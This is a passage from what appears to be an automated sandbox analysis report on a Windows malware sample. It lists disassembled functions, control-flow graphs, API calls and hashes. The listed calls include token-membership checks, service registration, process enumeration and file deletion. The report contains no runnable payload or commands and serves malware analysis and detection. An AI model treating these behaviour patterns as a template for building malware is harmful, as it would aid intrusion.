                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateFileMutexObjectReleaseSingleWait
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1564016613-0
                                                                                                                                                                                                            • Opcode ID: 86bd1a580ac627909eb7dc0a30719ce3f9a462c3afc623551d6c3d8b18f77c78
                                                                                                                                                                                                            • Instruction ID: 7d022a6a7996e242e272378c3102cf937df472a7d0374d5bae725cd4843de80e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 86bd1a580ac627909eb7dc0a30719ce3f9a462c3afc623551d6c3d8b18f77c78
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0371DF79611208DFC304CFE9FC96AAA37B4FB99316F418119E905972B0DB359863CF81
                                                                                                                                                                                                            Function 009DB7A0 Relevance: 3.1, APIs: 2, Instructions: 89memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 1001 9db7a0-9db84c AllocateAndInitializeSid 1002 9db84e-9db85b 1001->1002 1003 9db861-9db864 1001->1003 1002->1003 1004 9db8ee-9db90e 1003->1004 1005 9db86a-9db885 CheckTokenMembership 1003->1005 1006 9db8b4-9db8e8 1005->1006 1007 9db887-9db8ae 1005->1007 1006->1004 1007->1006
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 009DB82B
                                                                                                                                                                                                            • CheckTokenMembership.KERNELBASE(00000000,?,?), ref: 009DB87D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocateCheckInitializeMembershipToken
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1663163955-0
                                                                                                                                                                                                            • Opcode ID: 9305acac8d9bb0afff04a7f5136104a5466c74832d2aff0ad0f983a0e1601d51
                                                                                                                                                                                                            • Instruction ID: 8326e7e60d8d0dfac591510392c08cbc9f5c9f8d3914eebe01f5309cf83032f6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9305acac8d9bb0afff04a7f5136104a5466c74832d2aff0ad0f983a0e1601d51
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6931BC78901388EFD704CFF4ED999BA7B78FB9A301B01815AE80296270C3705917DB51
                                                                                                                                                                                                            Function 009E2EB0 Relevance: 3.0, APIs: 2, Instructions: 40memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 1009 9e2eb0-9e2ef9 GetProcessHeap RtlFreeHeap 1010 9e2efb-9e2f07 1009->1010 1011 9e2f30-9e2f42 1009->1011 1012 9e2f1a-9e2f2f 1010->1012 1013 9e2f09-9e2f19 1010->1013 1014 9e2f56-9e2f57 1011->1014 1015 9e2f44-9e2f50 1011->1015 1015->1014
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,009E0367,?,009E0367,00000000), ref: 009E2ED1
                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000,?,009E0367,00000000), ref: 009E2ED8
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$FreeProcess
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3859560861-0
                                                                                                                                                                                                            • Opcode ID: a343c12eace479fafe7a3391502ff3fcfe3380ccd97ccc08bf1ee024380ce086
                                                                                                                                                                                                            • Instruction ID: 711b1b36ad373c24605d8e86f9e7e282cf5c9385b0bfb28c113cfb3025508d15
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a343c12eace479fafe7a3391502ff3fcfe3380ccd97ccc08bf1ee024380ce086
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D017C79504288DBC724CFE9FE5546A37F9F7987257508316E01A8B2B0D3329C97CB15
                                                                                                                                                                                                            Function 009DE2C0 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 1016 9de2c0-9de2e2 1017 9de2e4-9de2ec 1016->1017 1018 9de2f2-9de306 GetProcessHeap RtlAllocateHeap 1016->1018 1017->1018
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,00A0220A,02167FFC,?,?,?,?,009F463C), ref: 009DE2F8
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,00A0220A,02167FFC,?,?,?,?,009F463C), ref: 009DE2FF
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocateProcess
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1357844191-0
                                                                                                                                                                                                            • Opcode ID: f16b0b59db5c697199693f4fe4521dec0968a6cae56726d08118e3ef7e096b68
                                                                                                                                                                                                            • Instruction ID: 5018bd38071d6999664bd1b28fc4381cc4ff6cc5d3f10a726d5a30e037da0123
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f16b0b59db5c697199693f4fe4521dec0968a6cae56726d08118e3ef7e096b68
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76E04F76514204DFCB04DFE5EC49AD937B8E748305B008119F60AC6261C631A5838B94
                                                                                                                                                                                                            Function 009F3CF0 Relevance: 1.6, APIs: 1, Instructions: 120fileCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 1221 9f3cf0-9f3d33 1222 9f3d35-9f3d3f 1221->1222 1223 9f3d41-9f3d51 1221->1223 1224 9f3d58-9f3e30 call 9de430 call 9d2f90 call 9dc580 call 9e1bb0 CreateFileA 1222->1224 1223->1224 1233 9f3e53-9f3e64 1224->1233 1234 9f3e32-9f3e51 1224->1234 1236 9f3e66 1233->1236 1237 9f3e70-9f3e84 1233->1237 1235 9f3e8a-9f3e9d 1234->1235 1238 9f3e9f-9f3ec0 1235->1238 1239 9f3ec2-9f3eca 1235->1239 1236->1237 1237->1235 1240 9f3ed0-9f3ef7 call 9fa7e0 1238->1240 1239->1240
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 009F3E0B
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                            • Opcode ID: 4c26716bb4c073b7557be37fd0dc21693c5eba9dd1435b0fb424abb2ef405ed5
                                                                                                                                                                                                            • Instruction ID: ad5b5917a52c3d0492b24549a9bc06da42bc6636f8c3fbe5944c7a6c70060416
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c26716bb4c073b7557be37fd0dc21693c5eba9dd1435b0fb424abb2ef405ed5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0941DD7AA50308DBC350EBE0FC827A53BB0FBD9701F218615E641962B4E77949A3CB85
                                                                                                                                                                                                            Function 009F45A9 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 1243 9f45a9-9f4637 call 9f0610 call 9ffde0 call 9e9410 call a01660
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExitProcess
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                                                                                            • Opcode ID: becfd5f3b5691a2dc0466f6583effe11da7baf907b1783ca6dabaf8e4889ee36
                                                                                                                                                                                                            • Instruction ID: 9a783c89bb3e2861f0f6760016ad9fe5f4eb8a1cc8018239fa41d1d223d62040
                                                                                                                                                                                                            • Opcode Fuzzy Hash: becfd5f3b5691a2dc0466f6583effe11da7baf907b1783ca6dabaf8e4889ee36
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8611047AA512098FC710EFF4FE8956937B0FBD53463058826E142862B5FB364413D781
                                                                                                                                                                                                            Function 009D2800 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 1253 9d2800-9d2832 call 9fb150 1256 9d283e-9d2842 ExitProcess 1253->1256 1257 9d2834 1253->1257 1257->1256
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExitProcess
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                                                                                            • Opcode ID: 233d91fd9a26e77d5b8211320e67d156e9dab4154f19ef02e248df83533ae2e7
                                                                                                                                                                                                            • Instruction ID: 04e1e452eaa030daae98deda51cb39f395bf54fb194e4d011c90fe7f38c215f5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 233d91fd9a26e77d5b8211320e67d156e9dab4154f19ef02e248df83533ae2e7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3AE08C3C10030CCBC308DFE8D8D687637A9EB86304754C21B99164B2A1CA39A487DF81
                                                                                                                                                                                                            Function 009DA4E0 Relevance: 1.3, APIs: 1, Instructions: 33stringCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 1258 9da4e0-9da53a lstrlen 1259 9da53c-9da548 1258->1259 1260 9da54e-9da564 1258->1260 1259->1260
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrlen
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1659193697-0
                                                                                                                                                                                                            • Opcode ID: 22e6905838fb92f0446a6585a068e19cf296a7d68aaa01dcdcd890b706c82a61
                                                                                                                                                                                                            • Instruction ID: 56bc7fb1c161a0fcee1d4ce2bd6eeb66c5bfdadadf54100390ea82a3784227ee
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 22e6905838fb92f0446a6585a068e19cf296a7d68aaa01dcdcd890b706c82a61
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 02F0AF7D650224EFC701DFE1FD0A0AA3BB8FBDA3613414012E40692134E7764867DF82

                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                            Function 009DAF20 Relevance: 7.9, APIs: 5, Instructions: 385serviceCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenSCManagerA.ADVAPI32(00000000,00000000,80000000), ref: 009DB0AA
                                                                                                                                                                                                            • EnumServicesStatusA.ADVAPI32(00000000,00000030,00000003,?,00000024,?,?,00000000), ref: 009DB15A
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 009DB17A
                                                                                                                                                                                                            • EnumServicesStatusA.ADVAPI32(00000000,00000030,00000003,00000000,?,?,?,00000000), ref: 009DB216
                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 009DB41C
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: EnumServicesStatus$CloseErrorHandleLastManagerOpenService
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1579346331-0
                                                                                                                                                                                                            • Opcode ID: 0759a2bcae14879d1550fdbe9e27605c3bea1956c73a3f714b4440dcaf09b39b
                                                                                                                                                                                                            • Instruction ID: 39cea7886abf54855b0b8c653a410f3a0fe7fd4647fda1ff6f43cedbc6c8d386
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0759a2bcae14879d1550fdbe9e27605c3bea1956c73a3f714b4440dcaf09b39b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5AF142BAA01300DFC714CFE4FD856AA3BB4F799351B11C51AE542972B4E73588A3CB91
                                                                                                                                                                                                            Function 009F9580 Relevance: 7.7, APIs: 5, Instructions: 220filesleepCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8,00000001), ref: 009F9679
                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 009F97B8
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 009F98A9
                                                                                                                                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 009F98CB
                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 009F98E4
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileFind$CloseDeleteFirstNextSleep
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1528862845-0
                                                                                                                                                                                                            • Opcode ID: b5ec3635a9bf465298b857a510bd642f6a76ed862f0da6413d83a1655af61603
                                                                                                                                                                                                            • Instruction ID: b3690aa2fb8cf6e2d4f22f7b05300e487472cbd357cfe6224f2b083e8f164705
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b5ec3635a9bf465298b857a510bd642f6a76ed862f0da6413d83a1655af61603
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D091EF7E901304CBC704DFE4FC826A937B4FBDA311B00861AEA469B270EB768953CB51
                                                                                                                                                                                                            Function 009E6C10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 187registrysynchronizationCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegisterServiceCtrlHandlerA.ADVAPI32(012A0610,Function_00011860), ref: 009E6D72
                                                                                                                                                                                                            • SetServiceStatus.ADVAPI32(00000000,00A405F8), ref: 009E6DD5
                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 009E6DE9
                                                                                                                                                                                                            • SetServiceStatus.ADVAPI32(00000000,00A405F8), ref: 009E6E8A
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00001388), ref: 009E6EBE
                                                                                                                                                                                                            • SetServiceStatus.ADVAPI32(00000000,00A405F8), ref: 009E6F2B
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 009E6F42
                                                                                                                                                                                                            • SetServiceStatus.ADVAPI32(00000000,00A405F8), ref: 009E6FAA
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A5A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322570694.0000000000A5B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9d0000_qbf30bzbv7f7qnhdav.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Service$Status$CloseCreateCtrlEventHandleHandlerObjectRegisterSingleWait
                                                                                                                                                                                                            • String ID: =ZMI
                                                                                                                                                                                                            • API String ID: 3399922960-150576250
                                                                                                                                                                                                            • Opcode ID: 4e0b9cbaf2cae9297906cbdaa18e65ee5f522d8c1e87ae6e07a9fdaa2412c5e3
                                                                                                                                                                                                            • Instruction ID: 36fc171f3ccf6bb2aaa2418f4384932fbc993af247088ba5b5b71f3ec1c5423c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e0b9cbaf2cae9297906cbdaa18e65ee5f522d8c1e87ae6e07a9fdaa2412c5e3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7391AA7C601311CBC304CFE9FD899A63BB5F7EA351702860AE556862B4C77A4863CF46
                                                                                                                                                                                                            Function 009E4380 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 387processCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009E44A7
                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,?), ref: 009E45C2
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 009E47CE
                                                                                                                                                                                                            • Module32First.KERNEL32(00000000,00000224), ref: 009E4842
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,0000000A), ref: 009E495A
                                                                                                                                                                                                            • Process32Next.KERNEL32(?,00000128), ref: 009E49AD
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 009E4A20
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1322438878.00000000009D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009D0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322410149.00000000009D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322480504.0000000000A07000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A0C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.1322500850.0000000000A49000.00000004.00000001.01000000.00000004.sdmpDownload File
